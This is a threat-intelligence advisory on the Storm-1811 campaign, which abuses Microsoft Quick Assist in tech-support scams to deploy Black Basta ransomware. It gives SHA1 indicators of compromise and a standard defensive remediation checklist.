Analysis Summary

The Microsoft Threat Intelligence team has identified the financially motivated cybercriminal group Storm-1811 using Quick Assist a legitimate Microsoft tool in social engineering attacks to deploy Black Basta ransomware.

These attacks involve impersonation through voice phishing, tricking victims into installing remote monitoring tools, and delivering QakBot and Cobalt Strike before deploying ransomware. Threat actors misuse Quick Assist by posing as trusted contacts, such as Microsoft support or company IT professionals, to gain device access. Once access is granted, they execute commands to download malicious payloads leading to domain enumeration lateral movement and eventual ransomware deployment via PsExec.

To make these attacks more convincing, the company said that Storm-1811 employs link listing attacks to flood victims' inboxes with subscribed content making fraudulent IT support calls seem more legitimate. Microsoft is addressing the misuse of Quick Assist by incorporating warning messages to alert users of potential tech support scams.

This campaign which began in mid-April 2024 has targeted various industries, including manufacturing, construction, food and beverage, and transportation. The opportunistic nature of these attacks and the significant impact on victims make ransomware an effective tactic for threat actors.

Black Basta is described by Microsoft as a "closed ransomware offering", not a ransomware-as-a-service operation. It is distributed by a small number of actors relying on others for initial access and malware infrastructure. Since its emergence in April 2022, Black Basta has been deployed following access through QakBot and similar malware emphasizing the need for organizations to focus on preventing initial access stages to mitigate ransomware threats.

Organizations are advised to block or uninstall Quick Assist if not in use and train employees to identify tech support scams. These measures are crucial to prevent the initial stages of the attack and reduce the likelihood of ransomware deployment.

Impact

• Unauthorized Access
• Command Execution
• Sensitive Data Theft
• Financial Loss

Indicators of Compromise

SHA1

• cd41f4f69df53e33944d053c75296c805e41380c
• 3531adb13fd2ac77bfb8bbba53994805913ffd9b
• 893384de883db97c39a12899cc96afdcfb11f09c
• b24904a91d9c3ce2c6e4d506ca173f98bb5f7a0a

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Maintain cyber hygiene by updating your anti-virus software and implementing a patch management lifecycle.
• Along with network and system hardening, code hardening should be implemented within the organization so that their websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed codes.
• Enable two-factor authentication.
• In a ransomware attack, the adversary will often delete or encrypt backups if they have access to them. That’s why it’s important to keep offline (preferably off-site), encrypted backups of data and test them regularly.
• Emails from unknown senders should always be treated with caution.
• Never trust or open links and attachments received from unknown sources/senders.
• Updates for operating systems, applications, and firmware should be installed as soon as possible.
• Check the active directories, servers, workstations, and domain controllers for new or unfamiliar accounts.
• To create safe distant connections, consider installing and utilizing a virtual private network (VPN).